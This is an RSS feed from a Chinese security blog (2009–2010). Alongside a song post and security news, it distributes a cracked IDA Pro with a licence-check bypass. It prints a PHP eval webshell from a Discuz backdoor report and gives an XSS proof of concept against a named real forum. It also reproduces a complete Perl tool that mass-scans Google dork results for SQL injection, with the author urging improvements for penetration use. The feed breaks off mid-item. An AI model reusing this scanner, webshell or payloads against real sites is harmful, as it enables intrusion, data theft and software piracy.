<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
<channel>
<title><![CDATA[召唤]]></title>
<link>http://www.patching.net/zhaohuan/</link>
<description><![CDATA[我遇见你是最美丽的意外:)]]></description>
<language>zh-cn</language>
<copyright><![CDATA[Copyright 2005 PBlog3 v2.8]]></copyright>
<webMaster><![CDATA[sunsp2@163.com(召唤)]]></webMaster>
<generator>PBlog2 v2.4</generator> 
<image>
	<title>召唤</title>
	<url>http://www.patching.net/zhaohuan/images/logos.gif</url>
	<link>http://www.patching.net/zhaohuan/</link>
	<description>召唤</description>
</image>

			<item>
			<link>http://www.patching.net/zhaohuan/article.asp?id=265</link>
			<title><![CDATA[推荐：《传奇》- 王菲]]></title>
			<author>sunsp2@163.com(ZhaoHuAn)</author>
			<category><![CDATA[0thers]]></category>
			<pubDate>Wed,17 Feb 2010 21:23:46 +0800</pubDate>
			<guid>http://www.patching.net/zhaohuan/default.asp?id=265</guid>
		<description><![CDATA[&nbsp;&nbsp; —《传奇》<br/><br/>　　词：左右&nbsp;&nbsp;曲：李键<br/><div class="UBBPanel quotePanel"><div class="UBBTitle"><img src="http://www.patching.net/zhaohuan/images/quote.gif" style="margin:0px 2px -3px 0px" alt="引用内容"/> 引用内容</div><div class="UBBContent"><br/>　　只因为在人群中多看了你一眼<br/><br/>　　再也没能忘掉你的容颜<br/><br/>　　梦想着偶然能有一天再相见<br/><br/>　　从此我开始孤单地思念<br/><br/>　　想你时你在天边<br/><br/>　　想你时你在眼前<br/><br/>　　想你时你在脑海<br/><br/>　　想你时你在心田<br/><br/>　　宁愿相信我们前世有约<br/><br/>　　今生的爱情故事不会再改变<br/><br/>　　宁愿用这一生等你发现<br/><br/>　　我一直在你身边<br/><br/>　　从未走远<br/><br/>　　只因为在人群中多看了你一眼<br/><br/>　　再也没能忘掉你的容颜<br/><br/>　　梦想着偶然能有一天再相见<br/><br/>　　从此我开始孤单地思念<br/><br/>　　想你时你在天边<br/><br/>　　想你时你在眼前<br/><br/>　　想你时你在脑海<br/><br/>　　想你时你在心田<br/><br/>　　宁愿相信我们前世有约<br/><br/>　　今生的爱情故事不会再改变<br/><br/>　　宁愿用这一生等你发现<br/><br/>　　我一直在你身边<br/><br/>　　从未走远<br/><br/>　　宁愿相信我们前世有约<br/><br/>　　今生的爱情故事不会再改变<br/><br/>　　宁愿用这一生等你发现<br/><br/>　　我一直在你身边<br/><br/>　　从未走远<br/><br/>　　只因为在人群中多看了你一眼</div></div><br/><img src="http://www.patching.net/zhaohuan/attachments/month_1002/o201021923617.jpg" border="0" alt=""/><br/><br/>王菲-传奇----录音室版【4.51 MB (4,737,985 字节)】<br/><a href="http://www.rayfile.com/zh-cn/files/3c4c3851-1a56-11df-9e4e-0015c55db73d/" target="_blank" rel="external">http://www.rayfile.com/zh-cn/files/3c4c3851-1a56-11df-9e4e-0015c55db73d/</a><br/><br/><br/>王菲-传奇(Live) ----最好音质的现场版本下载【4.63 MB (4,858,469 字节)】<br/><a href="http://www.rayfile.com/zh-cn/files/50402857-18cd-11df-be39-0015c55db73d/" target="_blank" rel="external">http://www.rayfile.com/zh-cn/files/50402857-18cd-11df-be39-0015c55db73d/</a>]]></description>
		</item>
		
			<item>
			<link>http://www.patching.net/zhaohuan/article.asp?id=264</link>
			<title><![CDATA[IDA Pro 5.5(+Hex-Rays Decompiler v1.1)]]></title>
			<author>sunsp2@163.com(ZhaoHuAn)</author>
			<category><![CDATA[Security]]></category>
			<pubDate>Sat,19 Dec 2009 14:31:00 +0800</pubDate>
			<guid>http://www.patching.net/zhaohuan/default.asp?id=264</guid>
		<description><![CDATA[<p><img style="margin-right: 10px" height="129" alt="ida pro 5.5" width="128" align="left" src="http://www.hex-rays.com/images/idalogo.jpg" /></p>
<h3>Ida pro advanced v5.5 + hex-Rays Decompiler v1.1</h3>
<p>老外真猛，连Decompiler都放出来了~</p>
<p>*文件大小:87.4MB&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 2009-12-18</p>
<p>&nbsp;****************************************************************************************</p>
<p><a target="_blank" href="http://dl.dropbox.com/u/3158427/Down/idapro55.zip">http://dl.dropbox.com/u/3158427/Down/idapro55.zip</a><br />
<a target="_blank" href="http://dl.dropbox.com/u/3158427/Down/IDA Pro Advanced 5.5 去除局域网检测补丁.rar">http://dl.dropbox.com/u/3158427/Down/IDA&nbsp;Pro&nbsp;Advanced&nbsp;5.5&nbsp;去除局域网检测补丁.rar</a><br />
<a target="_blank" href="http://dl.dropbox.com/u/3158427/Down/IDA Pro Advanced v5.5_Simplified Chinese language file.rar">http://dl.dropbox.com/u/3158427/Down/IDA&nbsp;Pro&nbsp;Advanced&nbsp;v5.5_Simplified&nbsp;Chinese&nbsp;language&nbsp;file.rar</a><br />
<a href="http://dl.dropbox.com/u/3158427/Down/PythonForWin2.5.rar">http://dl.dropbox.com/u/3158427/Down/PythonForWin2.5.rar</a></p>
<p>*****************************************************************************************</p>
<p>各种分流下载：</p>
<p>http://hotfile.com/dl/20983476/df1b86d/idapro55.zip.html<br />
<br />
http://rapidshare.com/files/322331794/idapro55.zip.html<br />
<br />
http://narod.ru/disk/16084747000/idapro55.zip.html&nbsp;<br />
<br />
<a href="http://www.multiupload.com/GICLN1AOE3">http://www.multiupload.com/GICLN1AOE3</a></p>]]></description>
		</item>
		
			<item>
			<link>http://www.patching.net/zhaohuan/article.asp?id=263</link>
			<title><![CDATA[R.I.P Str0ke is still alive:)]]></title>
			<author>sunsp2@163.com(ZhaoHuAn)</author>
			<category><![CDATA[News]]></category>
			<pubDate>Thu,05 Nov 2009 20:09:17 +0800</pubDate>
			<guid>http://www.patching.net/zhaohuan/default.asp?id=263</guid>
		<description><![CDATA[<div class="UBBPanel quotePanel"><div class="UBBTitle"><img src="http://www.patching.net/zhaohuan/images/quote.gif" style="margin:0px 2px -3px 0px" alt="引用内容"/> 引用内容</div><div class="UBBContent">&#34;Hi,<br/><br/>I know by now that many of you have seen the story at...<br/><br/><a href="http://bl4cksecurity.blogspot.com/2009/11 <img src="http://www.patching.net/zhaohuan/images/smilies/icon_tong.GIF" border="0" style="margin:0px 0px -2px 0px" alt=""/>r0ke-milworms-funeral-is-this-friday.html" target="_blank" rel="external">http://bl4cksecurity.blogspot.com/2009/11 <img src="http://www.patching.net/zhaohuan/images/smilies/icon_tong.GIF" border="0" style="margin:0px 0px -2px 0px" alt=""/>r0ke-milworms-funeral-is-this-friday.html</a><br/><br/><br/><br/>I know this because MANY of you have written me off-list with the message &#34;have<br/>you heard the news?&#34;... If I did not personally reply, I am sorry, but my inbox<br/>has been swamped today.<br/><br/>Well, good news and bad news here.<br/><br/>Bad news first. The above story is a hoax. Str0ke is alive, well, and kicking.<br/>Don&#39;t feel bad. Many of the best in the industry got taken in by the story. I<br/>fell for it, too -- hook, line, and sinker. Oh well, live and learn.<br/><br/>Now the good news. The folks at OffSec, along with David Kennedy and others, are<br/>talking over milw0rm from stroke. Read the announcement here:<br/><a href="http://www.offensive-security.com/blog/" target="_blank" rel="external">http://www.offensive-security.com/blog/</a><br/><br/><br/>I had just talked with Muts yesterday about another issue, and he indicated that<br/>an announcement regarding milw0rm would be coming out soon, but I suspect that<br/>the hoax regarding str0ke and the buzz about inj3ct0r.com<br/><br/>may have forced an early pre-announcement.<br/><br/>I know that milw0rm will be in great hands.&#34;</div></div><br/><br/><a target="_blank" href="http://www.offensive-security.com/blog/offsec/offensive-security-exploit-archive/" rel="external">http://www.offensive-security.com/blog/offsec/offensive-security-exploit-archive/</a><br/><br/>这个消息 貌似是backtrack的老大要接手milw0rm了~ <br/>]]></description>
		</item>
		
			<item>
			<link>http://www.patching.net/zhaohuan/article.asp?id=262</link>
			<title><![CDATA[Discuz 3rd Party攻击第三波出现了]]></title>
			<author>sunsp2@163.com(ZhaoHuAn)</author>
			<category><![CDATA[News]]></category>
			<pubDate>Thu,20 Aug 2009 18:14:49 +0800</pubDate>
			<guid>http://www.patching.net/zhaohuan/default.asp?id=262</guid>
		<description><![CDATA[不知道又是哪个同学的杰作 初步预测是劫持了customer.discuz.net 再配合自定义模板变量那个漏洞 管理员访问后台时 便会生成一个一句话后门<br/><br/><div class="UBBPanel quotePanel"><div class="UBBTitle"><img src="http://www.patching.net/zhaohuan/images/quote.gif" style="margin:0px 2px -3px 0px" alt="引用内容"/> 引用内容</div><div class="UBBContent">自定义模板变量:<br/>变&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;量 : {&#39;,&#39;&#39;);ECHO &#39;&#39;;$X=SUBSTR(MD5($_GET[&#39;B&#39;]),28);IF($X==&#39;7aaa&#39;)EVAL($_POST[&#39;A&#39;]);//}<br/>替换内容 : aaaaaaaaaa</div></div><br/><br/><br/>/forumdata/cache/usergroup_0.php<br/><br/><br/><div class="UBBPanel codePanel"><div class="UBBTitle"><img src="http://www.patching.net/zhaohuan/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent">&lt;?php (substr(md5($_POST[&#39;b&#39;]),28)==&#39;7aaa&#39;) &amp;&amp; eval($_POST[&#39;a&#39;]);?&gt;</div></div><br/><br/>对post的变量b进行md5加密，如果第28-31的位置是7aaa(32位MD5的后四位)的话 就执行eval($_POST[&#39;a&#39;]); <br/>这个验证很YD啊。。<br/><br/>估计最近很多大站被黑都是出自这个东东吧～<br/><br/>使用DZ论坛的同学请自行检查一下/forumdata/cache/下的文件<br/><br/><strong>相关讨论：< <img src="http://www.patching.net/zhaohuan/images/smilies/icon_tong.GIF" border="0" style="margin:0px 0px -2px 0px" alt=""/>rong><br/><br/><a target="_blank" href="http://hi.baidu.com/hi_heige/blog/item/eaa93c72599b241b8701b0f9.html" rel="external">警惕Third Party Content攻击</a><br/><br/><a target="_blank" href="http://discuz.net/viewthread.php?tid=1385006&amp;extra=page%3D1&amp;page=1" rel="external">Discuz发布的紧急公告</a><br/><br/><strong>相关补丁：< <img src="http://www.patching.net/zhaohuan/images/smilies/icon_tong.GIF" border="0" style="margin:0px 0px -2px 0px" alt=""/>rong><br/><a href="http://www.comsenz.com/Disucz_patch_20090818.zip" target="_blank" rel="external">http://www.comsenz.com/Disucz_patch_20090818.zip</a>]]></description>
		</item>
		
			<item>
			<link>http://www.patching.net/zhaohuan/article.asp?id=261</link>
			<title><![CDATA[国内首家支持挂马查询—超级巡警安全中心上线]]></title>
			<author>sunsp2@163.com(ZhaoHuAn)</author>
			<category><![CDATA[Security]]></category>
			<pubDate>Sat,11 Jul 2009 00:29:06 +0800</pubDate>
			<guid>http://www.patching.net/zhaohuan/default.asp?id=261</guid>
		<description><![CDATA[最近AA总他们上线了一个新产品：<a href="http://a.sucop.com/" target="_blank" rel="external">http://a.sucop.com/</a>&nbsp;&nbsp;&nbsp;&nbsp;支持一下！<br/><br/><strong>近日，国内首款免费安全软件厂商“超级巡警”推出一款极具前瞻性的安全平台，即“超级巡警安全中心”，该安全中心致力于对互联网整体安全状况进行评测，通过该安全中心的检测和评估，可为企业及个人用户提供权威准确的分析结果和防护病毒的措施，是目前国内第一款功能完备，性能强大，评价结果客观公正的网络安全评估平台。< <img src="http://www.patching.net/zhaohuan/images/smilies/icon_tong.GIF" border="0" style="margin:0px 0px -2px 0px" alt=""/>rong><br/><br/><img src="http://wlj.me/wp-content/uploads/2009/07/screen-capture-10-300x188.png" border="0" alt=""/><br/><img src="http://wlj.me/wp-content/uploads/2009/07/3-300x132.jpg" border="0" alt=""/><br/><br/><strong>目前已经具备“挂马网站查询”、“安全趋势分析”、“互联网安全动态评估”“百度安全查询”等多项功能，通过这些检测，可以快速发现并提醒日常互联网访问中可能存在的危险站点。< <img src="http://www.patching.net/zhaohuan/images/smilies/icon_tong.GIF" border="0" style="margin:0px 0px -2px 0px" alt=""/>rong><br/><br/>link: <a href="http://wlj.me/index.php/2009/07/a-sucop-com/" target="_blank" rel="external">http://wlj.me/index.php/2009/07/a-sucop-com/</a>]]></description>
		</item>
		
			<item>
			<link>http://www.patching.net/zhaohuan/article.asp?id=260</link>
			<title><![CDATA[milw0rm的镜像&amp;程序]]></title>
			<author>sunsp2@163.com(ZhaoHuAn)</author>
			<category><![CDATA[News]]></category>
			<pubDate>Thu,09 Jul 2009 11:11:33 +0800</pubDate>
			<guid>http://www.patching.net/zhaohuan/default.asp?id=260</guid>
		<description><![CDATA[前天听说milw0rm关闭了，真是个不幸的消息啊:(&nbsp;&nbsp;<br/><br/>今天上去找一个exp的时候，发现milw0rm已经打不开了，记得inj3ct0r以前自己做了个milw0rm的镜像，地址是<a href="http://inj3ct0r.com" target="_blank" rel="external">http://inj3ct0r.com</a> <br/><br/>貌似是目前国内能打开的一个数据还算比较完整的镜像站（要是有兄弟还有更好赶紧放出来吧 呵呵）<br/><br/>可以理解维护像milw0rm的站点是一件非常耗费时间和精力的事,不光要考虑到站点程序、数据库、服务器的维护，还有每天庞大的exploits要测试……<br/><br/>另外有兴趣的同学也可以YY个新的milw0rm出来~<br/><br/>程序在：<br/><a href="http://www.book.amjad.ws/save.php?action=save" target="_blank" rel="external">http://www.book.amjad.ws/save.php?action=save</a>&amp;id=41<br/><br/>数据库配置文件：<br/>ozellikler.php<br/><br/>DB： milw0rm.sql<br/><br/><br/>相信milw0rm还是会继续的 希望str0ke牛能找到一个好的接班人来接手她:) <br/><br/>PS：到上海了，14号到公司报到，这几个月实在是忙啊~]]></description>
		</item>
		
			<item>
			<link>http://www.patching.net/zhaohuan/article.asp?id=259</link>
			<title><![CDATA[SimpleDorkGUi &amp; G-Injector]]></title>
			<author>sunsp2@163.com(ZhaoHuAn)</author>
			<category><![CDATA[Security]]></category>
			<pubDate>Sat,30 May 2009 00:11:59 +0800</pubDate>
			<guid>http://www.patching.net/zhaohuan/default.asp?id=259</guid>
		<description><![CDATA[顾名思义，就是通过搜索引擎定义关键字来自动查找注入点的工具。对于比较庞大、脚本种类比较复杂的大型站点做渗透有所帮助。例如：site:qq.com inurl:php?id=<br/><br/><strong>SimpleDorkGUi< <img src="http://www.patching.net/zhaohuan/images/smilies/icon_tong.GIF" border="0" style="margin:0px 0px -2px 0px" alt=""/>rong>是<strong>low1z< <img src="http://www.patching.net/zhaohuan/images/smilies/icon_tong.GIF" border="0" style="margin:0px 0px -2px 0px" alt=""/>rong>今年年初用python写的一个图形界面的注入点搜索程序，现在已经推出了第二版。它可以通过根据你指定的搜索参数来进行搜索包含sql注入的地址，并判断数据类型。缺点是不能保存当前搜索进程以便下次的继续探测，不过0.2版本已经中加入了这个功能。<br/><br/><img src="http://img17.imageshack.us/img17/3763/sdgwin.jpg" border="0" alt=""/><br/><br/>0.2版的代码在：<br/><a href="http://www.darkc0de.com/others/simpleDorkGUi.py" target="_blank" rel="external">http://www.darkc0de.com/others/simpleDorkGUi.py</a><br/><br/>/*<span style="color:Purple">老版本0.1版在win下运行的话,这里有处代码要修改下:</span><br/><div class="UBBPanel codePanel"><div class="UBBTitle"><img src="http://www.patching.net/zhaohuan/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent">txtField = Text(myFrame, font=(&#39;Verdana&#39;, 8, &#39;&#39;),fg=&#39;orange&#39;, bg=&#39;black&#39;, width=400, <span style="color:Red">height=32</span>, wrap=WORD, yscrollcommand=scb.set)</div></div> 否则你将会看不到下面的操作工具栏;) */<br/><br/>0.1版建议运行在python 2.x版本上，因为python 3.x的不向后兼容，一些类似exec和print语句在3.x版本被去除或修改了导致程序报错。如果非要在3.x下运行的朋友可以自己修改一下代码，或者用官方提供的转换器转换一下：<br/>Py(2to3)<br/><a href="http://svn.python.org/view/sandbox/trunk/2to3/" target="_blank" rel="external">http://svn.python.org/view/sandbox/trunk/2to3/</a><br/><br/><br/><strong>G-Injector(perl)< <img src="http://www.patching.net/zhaohuan/images/smilies/icon_tong.GIF" border="0" style="margin:0px 0px -2px 0px" alt=""/>rong>是法国小伙<strong>jonathan59< <img src="http://www.patching.net/zhaohuan/images/smilies/icon_tong.GIF" border="0" style="margin:0px 0px -2px 0px" alt=""/>rong>的作品，以前常在h4cky0u玩的朋友应该对他比较熟悉<br/><br/><img src="http://nsa05.casimages.com/img/2009/02/17/09021706120571575.jpg" border="0" alt=""/><br/><img src="http://nsa05.casimages.com/img/2009/02/17/090217061311276266.jpg" border="0" alt=""/><br/><br/>代码如下：<br/><div class="UBBPanel codePanel"><div class="UBBTitle"><img src="http://www.patching.net/zhaohuan/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent">#!/usr/bin/perl <br/># <a href="http://rk-project.tk" target="_blank" rel="external">http://rk-project.tk</a> <br/># bsnseabra@hotmail.com <br/># zer0xProud © greetz to Gladiator <br/># Sábado, 10 de Janeiro de 2009 <br/>use LWP::UserAgent; <br/>my $top = LWP::UserAgent-&gt;new(); <br/>$top-&gt;timeout(10); <br/>$top-&gt;agent(&#34;Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/3.0&#34;); <br/>unless($ARGV[2]) { <br/>&nbsp;&nbsp; print &#34;=&gt; G-Injector &lt;=\n&#34;; <br/>&nbsp;&nbsp; print &#34;=&gt; Use: ginjector.pl \&#34;dork\&#34; limit sqltest.txt\n&#34;; <br/>&nbsp;&nbsp; print &#34;=&gt; Visit Us unkn0wn.ws! &lt;=\n&#34;; <br/>exit 0; <br/>} <br/>open(WEBSITES, &#34;&gt;&gt;&#34;, $ARGV[2])or die(&#34;File No Exists\n&#34;); <br/>chomp($ARGV[0]); <br/>syswrite STDOUT, &#34;=&gt;&lt;=&gt;=&lt;=&gt;=&lt;=&gt;=&lt;=&gt;=&lt;=\n&#34;; <br/>syswrite STDOUT, &#34;=&gt; G-Injector 1.0 &lt;=\n&#34;; <br/>syswrite STDOUT, &#34;=&gt;&lt;=&gt;=&lt;=&gt;=&lt;=&gt;=&lt;=&gt;=&lt;=\n&#34;; <br/>googler($ARGV[0],$ARGV[2]); <br/>close(WEBSITES); <br/>fin(); <br/>sub inject{ <br/>&#160;&#160;&#160;&#160;syswrite STDOUT, &#34;=&gt; Verifing.. $_[0]=\n&#34;; <br/>&#160;&#160;&#160;&#160;syswrite STDOUT, &#34;=&gt; Vulnerable??: &#34;; <br/>&#160;&#160;&#160;&#160;my $weborig = $_[0] . &#34;=&#34;; <br/>&#160;&#160;&#160;&#160;my $injhex = &#34;-1+union+sel&#101;ct+0x6c333374&#34;; <br/>&#160;&#160;&#160;&#160;my $injnum = &#34;-1+union+sel&#101;ct+0&#34;; <br/>&#160;&#160;&#160;&#160;my $hex=&#39;0x6c333374&#39;; <br/>&#160;&#160;&#160;&#160;my $sw = 0; <br/>&#160;&#160;&#160;&#160;$webnum=$weborig . $injnum; <br/>&#160;&#160;&#160;&#160;$webhex=$weborig . $injhex; <br/>&#160;&#160;&#160;&#160;for($conta=0;$conta&lt;=$ARGV[1];$conta++){ <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;if($conta&gt;0){ <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;$webhex.=&#39;,&#39;.$hex; <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;$webnum.=&#39;,&#39;.$conta; <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;} <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;$codeweb = $top-&gt;get($webhex . &#34;--&#34;); <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;if($codeweb-&gt;is_success){ <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;$getcodeweb = $codeweb-&gt;content; <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;if($getcodeweb =~ /l33t/ ){ <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;syswrite STDOUT, &#34;Ya!\n&#34;; <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;$sw = 1; <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;$conta = $_[1] + 1; <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;print WEBSITES &#34;$webnum--\n&#34;; <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;schemauser($webhex,$webnum); <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;} <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;} <br/>&#160;&#160;&#160;&#160;} <br/>&#160;&#160;&#160;&#160;if($sw == 0){ <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;syswrite STDOUT, &#34;n0p!\n&#34;; <br/>&#160;&#160;&#160;&#160;} <br/>} <br/>sub fin{ <br/>&#160;&#160;&#160;&#160;print &#34;\n Ok, Scan Finished, Thanks, Visit us unkn0wn.ws\n&#34;; <br/>} <br/>sub schemauser{ <br/>&#160;&#160;&#160;&#160;my $schinj = &#34;+from+information_schema.tables--&#34;; <br/>&#160;&#160;&#160;&#160;my $userinj = &#34;+from+mysql.user--&#34;; <br/>&#160;&#160;&#160;&#160;syswrite STDOUT, &#34;=&gt; Information Schema?: &#34;; <br/>&#160;&#160;&#160;&#160;my $ws = $_[0] . $schinj; <br/>&#160;&#160;&#160;&#160;my $wwss = $_[1] . $schinj; <br/>&#160;&#160;&#160;&#160;my $webschema = $top-&gt;get($ws); <br/>&#160;&#160;&#160;&#160;if($webschema-&gt;is_success){ <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;$getwebschema = $webschema-&gt;content; <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;if($getwebschema =~ /l33t/ ){ <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;syswrite STDOUT, &#34;Ya!\n&#34;; <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;print WEBSITES &#34;$wwss\n&#34;; <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;}else{ <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;syswrite STDOUT, &#34;n0p!\n&#34;; <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;} <br/>&#160;&#160;&#160;&#160;} <br/>&#160;&#160;&#160;&#160;syswrite STDOUT, &#34;=&gt; mysql.User??: &#34;; <br/>&#160;&#160;&#160;&#160;my $wu = $_[0] . $userinj; <br/>&#160;&#160;&#160;&#160;my $wwuu = $_[1] . $userinj; <br/>&#160;&#160;&#160;&#160;my $webuser = $top-&gt;get($wu); <br/>&#160;&#160;&#160;&#160;if($webuser-&gt;is_success){ <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;$getwebuser = $webuser-&gt;content; <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;if($webuser =~ /l33t/ ){ <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;syswrite STDOUT, &#34;Ya!\n&#34;; <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;print WEBSITES &#34;$wwuu\n&#34;; <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;}else{ <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;syswrite STDOUT, &#34;n0p!\n&#34;; <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;} <br/>&#160;&#160;&#160;&#160;} <br/>} <br/>sub cleared{ <br/>&#160;&#160;&#160;&#160;my $sha = $_[0]; <br/>&#160;&#160;&#160;&#160;if($sha =~ /\=/ ){ <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;@splitweb=split(&#34;=&#34;,$sha); <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;inject($splitweb[0]); <br/>&#160;&#160;&#160;&#160;} <br/>} <br/>sub googler{ <br/>&#160;&#160;&#160;&#160;sleep(1); <br/>&#160;&#160;&#160;&#160;syswrite STDOUT, &#34;Wait Please....\n&#34;; <br/>&#160;&#160;&#160;&#160;for($numpag=0;$numpag&lt;=40;$numpag=$numpag+10){ <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;my $find = &#39;<a href="http://www.google.com.ar <img src="http://www.patching.net/zhaohuan/images/smilies/icon_heart.gif" border="0" style="margin:0px 0px -2px 0px" alt=""/>arch?hl=es" target="_blank" rel="external">http://www.google.com.ar <img src="http://www.patching.net/zhaohuan/images/smilies/icon_heart.gif" border="0" style="margin:0px 0px -2px 0px" alt=""/>arch?hl=es</a>&amp;q=&#39; . $_[0] . &#39;&amp;start=&#39; . $numpag . &#39;&amp;sa=N&#39;; <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;my $resweb = $top-&gt;get($find); <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;if($resweb-&gt;is_success){ <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;$getwebs = $resweb-&gt;content; <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;while($getwebs =~ m/&lt;h3 class\=r&gt;&lt;a href\=\&#34;(.*?)\&#34; class\=/g ){ <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;cleared($1); <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;} <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;} <br/>&#160;&#160;&#160;&#160;} <br/>}</div></div><br/>比前者多了个后续的自动检测注入点的功能.并可定义将注入结果时时保存。<br/><br/>代码都是开源的，有兴趣的同学可以参考修改下。可以考虑加入代理功能和清除cookies来突破google的搜索请求限制、更多注入特征的判断、变形判断字符来打造成渗透利器：）]]></description>
		</item>
		
			<item>
			<link>http://www.patching.net/zhaohuan/article.asp?id=258</link>
			<title><![CDATA[[MS09-012]Token Kidnapping 安全补丁(KB956572)]]></title>
			<author>sunsp2@163.com(ZhaoHuAn)</author>
			<category><![CDATA[Security]]></category>
			<pubDate>Mon,20 Apr 2009 16:55:07 +0800</pubDate>
			<guid>http://www.patching.net/zhaohuan/default.asp?id=258</guid>
		<description><![CDATA[去年win下最流行的一个本地提权的漏洞微软终于放出补丁了。。<br/><br/><a target="_blank" href="http://www.microsoft.com/downloads/details.aspx?familyid=73D2324F-BE59-4B0C-B1AC-9876A13C2C03&amp;displaylang=zh-cn" rel="external">http://www.microsoft.com/downloads/details.aspx?familyid=73D2324F-BE59-4B0C-B1AC-9876A13C2C03&amp;displaylang=zh-cn</a>]]></description>
		</item>
		
			<item>
			<link>http://www.patching.net/zhaohuan/article.asp?id=257</link>
			<title><![CDATA[Discuz <=7.0(frame.php) xss Vulnerability]]></title>
			<author>sunsp2@163.com(ZhaoHuAn)</author>
			<category><![CDATA[Security]]></category>
			<pubDate>Sat,18 Apr 2009 22:08:57 +0800</pubDate>
			<guid>http://www.patching.net/zhaohuan/default.asp?id=257</guid>
		<description><![CDATA[前段时间做风险评估的时候发现的，这个xss 需要在开启了左右分栏的情况下才可以触发。<br/><br/><br/>PoC：<br/><br/><div class="UBBPanel codePanel"><div class="UBBTitle"><img src="http://www.patching.net/zhaohuan/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent">http://bbs.cctv.com/index.php?gid=24&#34;&gt;&lt;/iframe&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;</div></div><br/><br/>-----&gt;<br/>&nbsp;&nbsp;跳转到了<br/><div class="UBBPanel codePanel"><div class="UBBTitle"><img src="http://www.patching.net/zhaohuan/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent">http://bbs.cctv.com/frame.php?frameon=yes&amp;referer=http%3A//bbs.cctv.com/index.php%3Fgid%3D24%22%3E%3C/iframe%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E</div></div><br/><br/><br/><img src="http://www.patching.net/zhaohuan/attachments/month_0904/7200941822729.gif" border="0" alt=""/><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.patching.net/zhaohuan/article.asp?id=256</link>
			<title><![CDATA[摘一下老爸发的留言。]]></title>
			<author>sunsp2@163.com(ZhaoHuAn)</author>
			<category><![CDATA[Diary]]></category>
			<pubDate>Thu,09 Apr 2009 21:21:01 +0800</pubDate>
			<guid>http://www.patching.net/zhaohuan/default.asp?id=256</guid>
